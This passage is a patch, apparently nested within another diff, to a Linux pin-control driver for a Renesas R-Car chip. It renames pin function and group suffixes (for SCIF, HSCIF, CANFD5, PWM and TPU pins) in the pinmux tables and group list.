++	PINMUX_IPSR_GPSR(IP1SR1_31_28,	PWM0),
+ 
+ 	/* IP2SR1 */
+ 	PINMUX_IPSR_GPSR(IP2SR1_3_0,	HRX0),
+@@ -839,99 +839,99 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP2SR1_7_4,	IRQ4_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_11_8,	SSI_SCK),
+-	PINMUX_IPSR_GPSR(IP2SR1_11_8,	TCLK3),
++	PINMUX_IPSR_GPSR(IP2SR1_11_8,	TCLK3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_15_12,	SSI_WS),
+-	PINMUX_IPSR_GPSR(IP2SR1_15_12,	TCLK4),
++	PINMUX_IPSR_GPSR(IP2SR1_15_12,	TCLK4_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_19_16,	SSI_SD),
+-	PINMUX_IPSR_GPSR(IP2SR1_19_16,	IRQ0_A),
++	PINMUX_IPSR_GPSR(IP2SR1_19_16,	IRQ0_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_23_20,	AUDIO_CLKOUT),
+-	PINMUX_IPSR_GPSR(IP2SR1_23_20,	IRQ1_A),
++	PINMUX_IPSR_GPSR(IP2SR1_23_20,	IRQ1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR1_27_24,	AUDIO_CLKIN),
+ 	PINMUX_IPSR_GPSR(IP2SR1_27_24,	PWM3_A),
+ 
+-	PINMUX_IPSR_GPSR(IP2SR1_31_28,	TCLK2),
++	PINMUX_IPSR_GPSR(IP2SR1_31_28,	TCLK2_A),
+ 	PINMUX_IPSR_GPSR(IP2SR1_31_28,	MSIOF4_SS1),
+ 	PINMUX_IPSR_GPSR(IP2SR1_31_28,	IRQ3_B),
+ 
+ 	/* IP3SR1 */
+-	PINMUX_IPSR_GPSR(IP3SR1_3_0,	HRX3),
++	PINMUX_IPSR_GPSR(IP3SR1_3_0,	HRX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_3_0,	SCK3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_3_0,	MSIOF4_SS2),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_7_4,	HSCK3),
++	PINMUX_IPSR_GPSR(IP3SR1_7_4,	HSCK3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_7_4,	CTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_7_4,	MSIOF4_SCK),
+-	PINMUX_IPSR_GPSR(IP3SR1_7_4,	TPU0TO0_A),
++	PINMUX_IPSR_GPSR(IP3SR1_7_4,	TPU0TO0_B),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_11_8,	HRTS3_N),
++	PINMUX_IPSR_GPSR(IP3SR1_11_8,	HRTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_11_8,	RTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_11_8,	MSIOF4_TXD),
+-	PINMUX_IPSR_GPSR(IP3SR1_11_8,	TPU0TO1_A),
++	PINMUX_IPSR_GPSR(IP3SR1_11_8,	TPU0TO1_B),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_15_12,	HCTS3_N),
++	PINMUX_IPSR_GPSR(IP3SR1_15_12,	HCTS3_N_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_15_12,	RX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_15_12,	MSIOF4_RXD),
+ 
+-	PINMUX_IPSR_GPSR(IP3SR1_19_16,	HTX3),
++	PINMUX_IPSR_GPSR(IP3SR1_19_16,	HTX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_19_16,	TX3_A),
+ 	PINMUX_IPSR_GPSR(IP3SR1_19_16,	MSIOF4_SYNC),
+ 
+ 	/* IP0SR2 */
+ 	PINMUX_IPSR_GPSR(IP0SR2_3_0,	FXR_TXDA),
+ 	PINMUX_IPSR_GPSR(IP0SR2_3_0,	CANFD1_TX),
+-	PINMUX_IPSR_GPSR(IP0SR2_3_0,	TPU0TO2_A),
++	PINMUX_IPSR_GPSR(IP0SR2_3_0,	TPU0TO2_B),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR2_7_4,	FXR_TXENA_N),
++	PINMUX_IPSR_GPSR(IP0SR2_7_4,	FXR_TXENA_N_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_7_4,	CANFD1_RX),
+-	PINMUX_IPSR_GPSR(IP0SR2_7_4,	TPU0TO3_A),
++	PINMUX_IPSR_GPSR(IP0SR2_7_4,	TPU0TO3_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_11_8,	RXDA_EXTFXR),
+-	PINMUX_IPSR_GPSR(IP0SR2_11_8,	CANFD5_TX),
++	PINMUX_IPSR_GPSR(IP0SR2_11_8,	CANFD5_TX_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_11_8,	IRQ5),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_15_12,	CLK_EXTFXR),
+-	PINMUX_IPSR_GPSR(IP0SR2_15_12,	CANFD5_RX),
++	PINMUX_IPSR_GPSR(IP0SR2_15_12,	CANFD5_RX_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_15_12,	IRQ4_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_19_16,	RXDB_EXTFXR),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR2_23_20,	FXR_TXENB_N),
++	PINMUX_IPSR_GPSR(IP0SR2_23_20,	FXR_TXENB_N_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR2_27_24,	FXR_TXDB),
+ 
+-	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TPU0TO1),
++	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TPU0TO1_A),
+ 	PINMUX_IPSR_GPSR(IP0SR2_31_28,	CANFD6_TX),
+-	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TCLK2_B),
++	PINMUX_IPSR_GPSR(IP0SR2_31_28,	TCLK2_C),
+ 
+ 	/* IP1SR2 */
+-	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TPU0TO0),
++	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TPU0TO0_A),
+ 	PINMUX_IPSR_GPSR(IP1SR2_3_0,	CANFD6_RX),
+-	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TCLK1_A),
++	PINMUX_IPSR_GPSR(IP1SR2_3_0,	TCLK1_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_7_4,	CAN_CLK),
+-	PINMUX_IPSR_GPSR(IP1SR2_7_4,	FXR_TXENA_N_X),
++	PINMUX_IPSR_GPSR(IP1SR2_7_4,	FXR_TXENA_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_11_8,	CANFD0_TX),
+-	PINMUX_IPSR_GPSR(IP1SR2_11_8,	FXR_TXENB_N_X),
++	PINMUX_IPSR_GPSR(IP1SR2_11_8,	FXR_TXENB_N_B),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_15_12,	CANFD0_RX),
+ 	PINMUX_IPSR_GPSR(IP1SR2_15_12,	STPWT_EXTFXR),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_19_16,	CANFD2_TX),
+-	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TPU0TO2),
+-	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TCLK3_A),
++	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TPU0TO2_A),
++	PINMUX_IPSR_GPSR(IP1SR2_19_16,	TCLK3_C),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_23_20,	CANFD2_RX),
+-	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TPU0TO3),
++	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TPU0TO3_A),
+ 	PINMUX_IPSR_GPSR(IP1SR2_23_20,	PWM1_B),
+-	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TCLK4_A),
++	PINMUX_IPSR_GPSR(IP1SR2_23_20,	TCLK4_C),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_27_24,	CANFD3_TX),
+-	PINMUX_IPSR_GPSR(IP1SR2_27_24,	PWM2_B),
++	PINMUX_IPSR_GPSR(IP1SR2_27_24,	PWM2),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR2_31_28,	CANFD3_RX),
+ 	PINMUX_IPSR_GPSR(IP1SR2_31_28,	PWM3_B),
+@@ -973,12 +973,12 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR3_23_20,	IPC_CLKIN),
+ 	PINMUX_IPSR_GPSR(IP1SR3_23_20,	IPC_CLKEN_IN),
+ 	PINMUX_IPSR_GPSR(IP1SR3_23_20,	PWM1_A),
+-	PINMUX_IPSR_GPSR(IP1SR3_23_20,	TCLK3_X),
++	PINMUX_IPSR_GPSR(IP1SR3_23_20,	TCLK3_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKOUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKEN_OUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_N_A),
+-	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_X),
++	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_31_28,	QSPI0_SSL),
+ 
+@@ -1507,15 +1507,14 @@ static const unsigned int canfd4_data_mux[] = {
+ };
+ 
+ /* - CANFD5 ----------------------------------------------------------------- */
+-static const unsigned int canfd5_data_pins[] = {
+-	/* CANFD5_TX, CANFD5_RX */
++static const unsigned int canfd5_data_a_pins[] = {
++	/* CANFD5_TX_A, CANFD5_RX_A */
+ 	RCAR_GP_PIN(2, 2), RCAR_GP_PIN(2, 3),
+ };
+-static const unsigned int canfd5_data_mux[] = {
+-	CANFD5_TX_MARK, CANFD5_RX_MARK,
++static const unsigned int canfd5_data_a_mux[] = {
++	CANFD5_TX_A_MARK, CANFD5_RX_A_MARK,
+ };
+ 
+-/* - CANFD5_B ----------------------------------------------------------------- */
+ static const unsigned int canfd5_data_b_pins[] = {
+ 	/* CANFD5_TX_B, CANFD5_RX_B */
+ 	RCAR_GP_PIN(1, 8), RCAR_GP_PIN(1, 9),
+@@ -1575,49 +1574,48 @@ static const unsigned int hscif0_ctrl_mux[] = {
+ };
+ 
+ /* - HSCIF1 ----------------------------------------------------------------- */
+-static const unsigned int hscif1_data_pins[] = {
+-	/* HRX1, HTX1 */
++static const unsigned int hscif1_data_a_pins[] = {
++	/* HRX1_A, HTX1_A */
+ 	RCAR_GP_PIN(0, 15), RCAR_GP_PIN(0, 14),
+ };
+-static const unsigned int hscif1_data_mux[] = {
+-	HRX1_MARK, HTX1_MARK,
++static const unsigned int hscif1_data_a_mux[] = {
++	HRX1_A_MARK, HTX1_A_MARK,
+ };
+-static const unsigned int hscif1_clk_pins[] = {
+-	/* HSCK1 */
++static const unsigned int hscif1_clk_a_pins[] = {
++	/* HSCK1_A */
+ 	RCAR_GP_PIN(0, 18),
+ };
+-static const unsigned int hscif1_clk_mux[] = {
+-	HSCK1_MARK,
++static const unsigned int hscif1_clk_a_mux[] = {
++	HSCK1_A_MARK,
+ };
+-static const unsigned int hscif1_ctrl_pins[] = {
+-	/* HRTS1_N, HCTS1_N */
++static const unsigned int hscif1_ctrl_a_pins[] = {
++	/* HRTS1_N_A, HCTS1_N_A */
+ 	RCAR_GP_PIN(0, 17), RCAR_GP_PIN(0, 16),
+ };
+-static const unsigned int hscif1_ctrl_mux[] = {
+-	HRTS1_N_MARK, HCTS1_N_MARK,
++static const unsigned int hscif1_ctrl_a_mux[] = {
++	HRTS1_N_A_MARK, HCTS1_N_A_MARK,
+ };
+ 
+-/* - HSCIF1_X---------------------------------------------------------------- */
+-static const unsigned int hscif1_data_x_pins[] = {
+-	/* HRX1_X, HTX1_X */
++static const unsigned int hscif1_data_b_pins[] = {
++	/* HRX1_B, HTX1_B */
+ 	RCAR_GP_PIN(1, 7), RCAR_GP_PIN(1, 6),
+ };
+-static const unsigned int hscif1_data_x_mux[] = {
+-	HRX1_X_MARK, HTX1_X_MARK,
++static const unsigned int hscif1_data_b_mux[] = {
++	HRX1_B_MARK, HTX1_B_MARK,
+ };
+-static const unsigned int hscif1_clk_x_pins[] = {
+-	/* HSCK1_X */
++static const unsigned int hscif1_clk_b_pins[] = {
++	/* HSCK1_B */
+ 	RCAR_GP_PIN(1, 10),
+ };
+-static const unsigned int hscif1_clk_x_mux[] = {
+-	HSCK1_X_MARK,
++static const unsigned int hscif1_clk_b_mux[] = {
++	HSCK1_B_MARK,
+ };
+-static const unsigned int hscif1_ctrl_x_pins[] = {
+-	/* HRTS1_N_X, HCTS1_N_X */
++static const unsigned int hscif1_ctrl_b_pins[] = {
++	/* HRTS1_N_B, HCTS1_N_B */
+ 	RCAR_GP_PIN(1, 9), RCAR_GP_PIN(1, 8),
+ };
+-static const unsigned int hscif1_ctrl_x_mux[] = {
+-	HRTS1_N_X_MARK, HCTS1_N_X_MARK,
++static const unsigned int hscif1_ctrl_b_mux[] = {
++	HRTS1_N_B_MARK, HCTS1_N_B_MARK,
+ };
+ 
+ /* - HSCIF2 ----------------------------------------------------------------- */
+@@ -1644,49 +1642,48 @@ static const unsigned int hscif2_ctrl_mux[] = {
+ };
+ 
+ /* - HSCIF3 ----------------------------------------------------------------- */
+-static const unsigned int hscif3_data_pins[] = {
+-	/* HRX3, HTX3 */
++static const unsigned int hscif3_data_a_pins[] = {
++	/* HRX3_A, HTX3_A */
+ 	RCAR_GP_PIN(1, 24), RCAR_GP_PIN(1, 28),
+ };
+-static const unsigned int hscif3_data_mux[] = {
+-	HRX3_MARK, HTX3_MARK,
++static const unsigned int hscif3_data_a_mux[] = {
++	HRX3_A_MARK, HTX3_A_MARK,
+ };
+-static const unsigned int hscif3_clk_pins[] = {
+-	/* HSCK3 */
++static const unsigned int hscif3_clk_a_pins[] = {
++	/* HSCK3_A */
+ 	RCAR_GP_PIN(1, 25),
+ };
+-static const unsigned int hscif3_clk_mux[] = {
+-	HSCK3_MARK,
++static const unsigned int hscif3_clk_a_mux[] = {
++	HSCK3_A_MARK,
+ };
+-static const unsigned int hscif3_ctrl_pins[] = {
+-	/* HRTS3_N, HCTS3_N */
++static const unsigned int hscif3_ctrl_a_pins[] = {
++	/* HRTS3_N_A, HCTS3_N_A */
+ 	RCAR_GP_PIN(1, 26), RCAR_GP_PIN(1, 27),
+ };
+-static const unsigned int hscif3_ctrl_mux[] = {
+-	HRTS3_N_MARK, HCTS3_N_MARK,
++static const unsigned int hscif3_ctrl_a_mux[] = {
++	HRTS3_N_A_MARK, HCTS3_N_A_MARK,
+ };
+ 
+-/* - HSCIF3_A ----------------------------------------------------------------- */
+-static const unsigned int hscif3_data_a_pins[] = {
+-	/* HRX3_A, HTX3_A */
++static const unsigned int hscif3_data_b_pins[] = {
++	/* HRX3_B, HTX3_B */
+ 	RCAR_GP_PIN(1, 4), RCAR_GP_PIN(1, 0),
+ };
+-static const unsigned int hscif3_data_a_mux[] = {
+-	HRX3_A_MARK, HTX3_A_MARK,
++static const unsigned int hscif3_data_b_mux[] = {
++	HRX3_B_MARK, HTX3_B_MARK,
+ };
+-static const unsigned int hscif3_clk_a_pins[] = {
+-	/* HSCK3_A */
++static const unsigned int hscif3_clk_b_pins[] = {
++	/* HSCK3_B */
+ 	RCAR_GP_PIN(1, 3),
+ };
+-static const unsigned int hscif3_clk_a_mux[] = {
+-	HSCK3_A_MARK,
++static const unsigned int hscif3_clk_b_mux[] = {
++	HSCK3_B_MARK,
+ };
+-static const unsigned int hscif3_ctrl_a_pins[] = {
+-	/* HRTS3_N_A, HCTS3_N_A */
++static const unsigned int hscif3_ctrl_b_pins[] = {
++	/* HRTS3_N_B, HCTS3_N_B */
+ 	RCAR_GP_PIN(1, 2), RCAR_GP_PIN(1, 1),
+ };
+-static const unsigned int hscif3_ctrl_a_mux[] = {
+-	HRTS3_N_A_MARK, HCTS3_N_A_MARK,
++static const unsigned int hscif3_ctrl_b_mux[] = {
++	HRTS3_N_B_MARK, HCTS3_N_B_MARK,
+ };
+ 
+ /* - I2C0 ------------------------------------------------------------------- */
+@@ -2069,13 +2066,13 @@ static const unsigned int pcie1_clkreq_n_mux[] = {
+ 	PCIE1_CLKREQ_N_MARK,
+ };
+ 
+-/* - PWM0_A ------------------------------------------------------------------- */
+-static const unsigned int pwm0_a_pins[] = {
+-	/* PWM0_A */
++/* - PWM0 ------------------------------------------------------------------- */
++static const unsigned int pwm0_pins[] = {
++	/* PWM0 */
+ 	RCAR_GP_PIN(1, 15),
+ };
+-static const unsigned int pwm0_a_mux[] = {
+-	PWM0_A_MARK,
++static const unsigned int pwm0_mux[] = {
++	PWM0_MARK,
+ };
+ 
+ /* - PWM1_A ------------------------------------------------------------------- */
+@@ -2096,13 +2093,13 @@ static const unsigned int pwm1_b_mux[] = {
+ 	PWM1_B_MARK,
+ };
+ 
+-/* - PWM2_B ------------------------------------------------------------------- */
+-static const unsigned int pwm2_b_pins[] = {
+-	/* PWM2_B */
++/* - PWM2 ------------------------------------------------------------------- */
++static const unsigned int pwm2_pins[] = {
++	/* PWM2 */
+ 	RCAR_GP_PIN(2, 14),
+ };
+-static const unsigned int pwm2_b_mux[] = {
+-	PWM2_B_MARK,
++static const unsigned int pwm2_mux[] = {
++	PWM2_MARK,
+ };
+ 
+ /* - PWM3_A ------------------------------------------------------------------- */
+@@ -2159,22 +2156,22 @@ static const unsigned int pwm7_mux[] = {
+ 	PWM7_MARK,
+ };
+ 
+-/* - PWM8_A ------------------------------------------------------------------- */
+-static const unsigned int pwm8_a_pins[] = {
+-	/* PWM8_A */
++/* - PWM8 ------------------------------------------------------------------- */
++static const unsigned int pwm8_pins[] = {
++	/* PWM8 */
+ 	RCAR_GP_PIN(1, 13),
+ };
+-static const unsigned int pwm8_a_mux[] = {
+-	PWM8_A_MARK,
++static const unsigned int pwm8_mux[] = {
++	PWM8_MARK,
+ };
+ 
+-/* - PWM9_A ------------------------------------------------------------------- */
+-static const unsigned int pwm9_a_pins[] = {
+-	/* PWM9_A */
++/* - PWM9 ------------------------------------------------------------------- */
++static const unsigned int pwm9_pins[] = {
++	/* PWM9 */
+ 	RCAR_GP_PIN(1, 14),
+ };
+-static const unsigned int pwm9_a_mux[] = {
+-	PWM9_A_MARK,
++static const unsigned int pwm9_mux[] = {
++	PWM9_MARK,
+ };
+ 
+ /* - QSPI0 ------------------------------------------------------------------ */
+@@ -2237,75 +2234,51 @@ static const unsigned int scif0_ctrl_mux[] = {
+ };
+ 
+ /* - SCIF1 ------------------------------------------------------------------ */
+-static const unsigned int scif1_data_pins[] = {
+-	/* RX1, TX1 */
++static const unsigned int scif1_data_a_pins[] = {
++	/* RX1_A, TX1_A */
+ 	RCAR_GP_PIN(0, 15), RCAR_GP_PIN(0, 14),
+ };
+-static const unsigned int scif1_data_mux[] = {
+-	RX1_MARK, TX1_MARK,
++static const unsigned int scif1_data_a_mux[] = {
++	RX1_A_MARK, TX1_A_MARK,
+ };
+-static const unsigned int scif1_clk_pins[] = {
+-	/* SCK1 */
++static const unsigned int scif1_clk_a_pins[] = {
++	/* SCK1_A */
+ 	RCAR_GP_PIN(0, 18),
+ };
+-static const unsigned int scif1_clk_mux[] = {
+-	SCK1_MARK,
++static const unsigned int scif1_clk_a_mux[] = {
++	SCK1_A_MARK,
+ };
+-static const unsigned int scif1_ctrl_pins[] = {
+-	/* RTS1_N, CTS1_N */
++static const unsigned int scif1_ctrl_a_pins[] = {
++	/* RTS1_N_A, CTS1_N_A */
+ 	RCAR_GP_PIN(0, 17), RCAR_GP_PIN(0, 16),
+ };
+-static const unsigned int scif1_ctrl_mux[] = {
+-	RTS1_N_MARK, CTS1_N_MARK,
++static const unsigned int scif1_ctrl_a_mux[] = {
++	RTS1_N_A_MARK, CTS1_N_A_MARK,
+ };
+ 
+-/* - SCIF1_X ------------------------------------------------------------------ */
+-static const unsigned int scif1_data_x_pins[] = {
+-	/* RX1_X, TX1_X */
++static const unsigned int scif1_data_b_pins[] = {
++	/* RX1_B, TX1_B */
+ 	RCAR_GP_PIN(1, 7), RCAR_GP_PIN(1, 6),
+ };
+-static const unsigned int scif1_data_x_mux[] = {
+-	RX1_X_MARK, TX1_X_MARK,
++static const unsigned int scif1_data_b_mux[] = {
++	RX1_B_MARK, TX1_B_MARK,
+ };
+-static const unsigned int scif1_clk_x_pins[] = {
+-	/* SCK1_X */
++static const unsigned int scif1_clk_b_pins[] = {
++	/* SCK1_B */
+ 	RCAR_GP_PIN(1, 10),
+ };
+-static const unsigned int scif1_clk_x_mux[] = {
+-	SCK1_X_MARK,
++static const unsigned int scif1_clk_b_mux[] = {
++	SCK1_B_MARK,
+ };
+-static const unsigned int scif1_ctrl_x_pins[] = {
+-	/* RTS1_N_X, CTS1_N_X */
++static const unsigned int scif1_ctrl_b_pins[] = {
++	/* RTS1_N_B, CTS1_N_B */
+ 	RCAR_GP_PIN(1, 9), RCAR_GP_PIN(1, 8),
+ };
+-static const unsigned int scif1_ctrl_x_mux[] = {
+-	RTS1_N_X_MARK, CTS1_N_X_MARK,
++static const unsigned int scif1_ctrl_b_mux[] = {
++	RTS1_N_B_MARK, CTS1_N_B_MARK,
+ };
+ 
+ /* - SCIF3 ------------------------------------------------------------------ */
+-static const unsigned int scif3_data_pins[] = {
+-	/* RX3, TX3 */
+-	RCAR_GP_PIN(1, 1), RCAR_GP_PIN(1, 0),
+-};
+-static const unsigned int scif3_data_mux[] = {
+-	RX3_MARK, TX3_MARK,
+-};
+-static const unsigned int scif3_clk_pins[] = {
+-	/* SCK3 */
+-	RCAR_GP_PIN(1, 4),
+-};
+-static const unsigned int scif3_clk_mux[] = {
+-	SCK3_MARK,
+-};
+-static const unsigned int scif3_ctrl_pins[] = {
+-	/* RTS3_N, CTS3_N */
+-	RCAR_GP_PIN(1, 2), RCAR_GP_PIN(1, 3),
+-};
+-static const unsigned int scif3_ctrl_mux[] = {
+-	RTS3_N_MARK, CTS3_N_MARK,
+-};
+-
+-/* - SCIF3_A ------------------------------------------------------------------ */
+ static const unsigned int scif3_data_a_pins[] = {
+ 	/* RX3_A, TX3_A */
+ 	RCAR_GP_PIN(1, 27), RCAR_GP_PIN(1, 28),
+@@ -2328,6 +2301,28 @@ static const unsigned int scif3_ctrl_a_mux[] = {
+ 	RTS3_N_A_MARK, CTS3_N_A_MARK,
+ };
+ 
++static const unsigned int scif3_data_b_pins[] = {
++	/* RX3_B, TX3_B */
++	RCAR_GP_PIN(1, 1), RCAR_GP_PIN(1, 0),
++};
++static const unsigned int scif3_data_b_mux[] = {
++	RX3_B_MARK, TX3_B_MARK,
++};
++static const unsigned int scif3_clk_b_pins[] = {
++	/* SCK3_B */
++	RCAR_GP_PIN(1, 4),
++};
++static const unsigned int scif3_clk_b_mux[] = {
++	SCK3_B_MARK,
++};
++static const unsigned int scif3_ctrl_b_pins[] = {
++	/* RTS3_N_B, CTS3_N_B */
++	RCAR_GP_PIN(1, 2), RCAR_GP_PIN(1, 3),
++};
++static const unsigned int scif3_ctrl_b_mux[] = {
++	RTS3_N_B_MARK, CTS3_N_B_MARK,
++};
++
+ /* - SCIF4 ------------------------------------------------------------------ */
+ static const unsigned int scif4_data_pins[] = {
+ 	/* RX4, TX4 */
+@@ -2384,64 +2379,63 @@ static const unsigned int ssi_ctrl_mux[] = {
+ 	SSI_SCK_MARK, SSI_WS_MARK,
+ };
+ 
+-/* - TPU ------------------------------------------------------------------- */
+-static const unsigned int tpu_to0_pins[] = {
+-	/* TPU0TO0 */
++/* - TPU -------------------------------------------------------------------- */
++static const unsigned int tpu_to0_a_pins[] = {
++	/* TPU0TO0_A */
+ 	RCAR_GP_PIN(2, 8),
+ };
+-static const unsigned int tpu_to0_mux[] = {
+-	TPU0TO0_MARK,
++static const unsigned int tpu_to0_a_mux[] = {
++	TPU0TO0_A_MARK,
+ };
+-static const unsigned int tpu_to1_pins[] = {
+-	/* TPU0TO1 */
++static const unsigned int tpu_to1_a_pins[] = {
++	/* TPU0TO1_A */
+ 	RCAR_GP_PIN(2, 7),
+ };
+-static const unsigned int tpu_to1_mux[] = {
+-	TPU0TO1_MARK,
++static const unsigned int tpu_to1_a_mux[] = {
++	TPU0TO1_A_MARK,
+ };
+-static const unsigned int tpu_to2_pins[] = {
+-	/* TPU0TO2 */
++static const unsigned int tpu_to2_a_pins[] = {
++	/* TPU0TO2_A */
+ 	RCAR_GP_PIN(2, 12),
+ };
+-static const unsigned int tpu_to2_mux[] = {
+-	TPU0TO2_MARK,
++static const unsigned int tpu_to2_a_mux[] = {
++	TPU0TO2_A_MARK,
+ };
+-static const unsigned int tpu_to3_pins[] = {
+-	/* TPU0TO3 */
++static const unsigned int tpu_to3_a_pins[] = {
++	/* TPU0TO3_A */
+ 	RCAR_GP_PIN(2, 13),
+ };
+-static const unsigned int tpu_to3_mux[] = {
+-	TPU0TO3_MARK,
++static const unsigned int tpu_to3_a_mux[] = {
++	TPU0TO3_A_MARK,
+ };
+ 
+-/* - TPU_A ------------------------------------------------------------------- */
+-static const unsigned int tpu_to0_a_pins[] = {
+-	/* TPU0TO0_A */
++static const unsigned int tpu_to0_b_pins[] = {
++	/* TPU0TO0_B */
+ 	RCAR_GP_PIN(1, 25),
+ };
+-static const unsigned int tpu_to0_a_mux[] = {
+-	TPU0TO0_A_MARK,
++static const unsigned int tpu_to0_b_mux[] = {
++	TPU0TO0_B_MARK,
+ };
+-static const unsigned int tpu_to1_a_pins[] = {
+-	/* TPU0TO1_A */
++static const unsigned int tpu_to1_b_pins[] = {
++	/* TPU0TO1_B */
+ 	RCAR_GP_PIN(1, 26),
+ };
+-static const unsigned int tpu_to1_a_mux[] = {
+-	TPU0TO1_A_MARK,
++static const unsigned int tpu_to1_b_mux[] = {
++	TPU0TO1_B_MARK,
+ };
+-static const unsigned int tpu_to2_a_pins[] = {
+-	/* TPU0TO2_A */
++static const unsigned int tpu_to2_b_pins[] = {
++	/* TPU0TO2_B */
+ 	RCAR_GP_PIN(2, 0),
+ };
+-static const unsigned int tpu_to2_a_mux[] = {
+-	TPU0TO2_A_MARK,
++static const unsigned int tpu_to2_b_mux[] = {
++	TPU0TO2_B_MARK,
+ };
+-static const unsigned int tpu_to3_a_pins[] = {
+-	/* TPU0TO3_A */
++static const unsigned int tpu_to3_b_pins[] = {
++	/* TPU0TO3_B */
+ 	RCAR_GP_PIN(2, 1),
+ };
+-static const unsigned int tpu_to3_a_mux[] = {
+-	TPU0TO3_A_MARK,
++static const unsigned int tpu_to3_b_mux[] = {
++	TPU0TO3_B_MARK,
+ };
+ 
+ /* - TSN0 ------------------------------------------------ */
+@@ -2551,8 +2545,8 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(canfd2_data),
+ 	SH_PFC_PIN_GROUP(canfd3_data),
+ 	SH_PFC_PIN_GROUP(canfd4_data),
+-	SH_PFC_PIN_GROUP(canfd5_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(canfd5_data_b),	/* suffix might be updated */
++	SH_PFC_PIN_GROUP(canfd5_data_a),
++	SH_PFC_PIN_GROUP(canfd5_data_b),
+ 	SH_PFC_PIN_GROUP(canfd6_data),
+ 	SH_PFC_PIN_GROUP(canfd7_data),
+ 	SH_PFC_PIN_GROUP(can_clk),
+@@ -2560,21 +2554,21 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(hscif0_data),
+ 	SH_PFC_PIN_GROUP(hscif0_clk),
+ 	SH_PFC_PIN_GROUP(hscif0_ctrl),
+-	SH_PFC_PIN_GROUP(hscif1_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_data_x),	/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_clk_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_ctrl_x),	/* suffix might be updated */
++	SH_PFC_PIN_GROUP(hscif1_data_a),
++	SH_PFC_PIN_GROUP(hscif1_clk_a),
++	SH_PFC_PIN_GROUP(hscif1_ctrl_a),
++	SH_PFC_PIN_GROUP(hscif1_data_b),
++	SH_PFC_PIN_GROUP(hscif1_clk_b),
++	SH_PFC_PIN_GROUP(hscif1_ctrl_b),
+ 	SH_PFC_PIN_GROUP(hscif2_data),
+ 	SH_PFC_PIN_GROUP(hscif2_clk),
+ 	SH_PFC_PIN_GROUP(hscif2_ctrl),
+-	SH_PFC_PIN_GROUP(hscif3_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_data_a),	/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_clk_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_ctrl_a),	/* suffix might be updated */
++	SH_PFC_PIN_GROUP(hscif3_data_a),
++	SH_PFC_PIN_GROUP(hscif3_clk_a),
++	SH_PFC_PIN_GROUP(hscif3_ctrl_a),
++	SH_PFC_PIN_GROUP(hscif3_data_b),
++	SH_PFC_PIN_GROUP(hscif3_clk_b),
++	SH_PFC_PIN_GROUP(hscif3_ctrl_b),
+ 
